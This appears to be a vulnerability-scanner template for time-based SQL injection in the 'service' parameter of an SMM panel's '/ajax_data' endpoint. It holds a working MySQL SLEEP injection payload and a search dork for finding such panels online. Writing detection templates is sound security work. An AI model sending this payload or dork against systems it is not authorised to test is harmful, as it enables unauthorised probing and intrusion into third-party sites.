id: smm-panel-sqli

info:
  name: Time-based SQL Injection Detection
  author: aether
  severity: critical
  description: |
    Detects a time-based SQL Injection vulnerability in the `service_detail` parameter via a POST request.
  tags: sqli, mysql, timing,dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  reference:
    - https://owasp.org/www-community/attacks/SQL_Injection

requests:
  - method: POST
    path:
      - "{{BaseURL}}/ajax_data"
    headers:
      Content-Type: "application/x-www-form-urlencoded"
    # The payload asks MySQL to SLEEP(5); the delay only occurs if the value reaches a SQL query unsanitised.
    body: "action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z"
    matchers:
      # Timing-only match: a host that is simply slow to respond also satisfies this, so confirm any hit manually.
      - type: dsl
        dsl:
          - "duration > 5"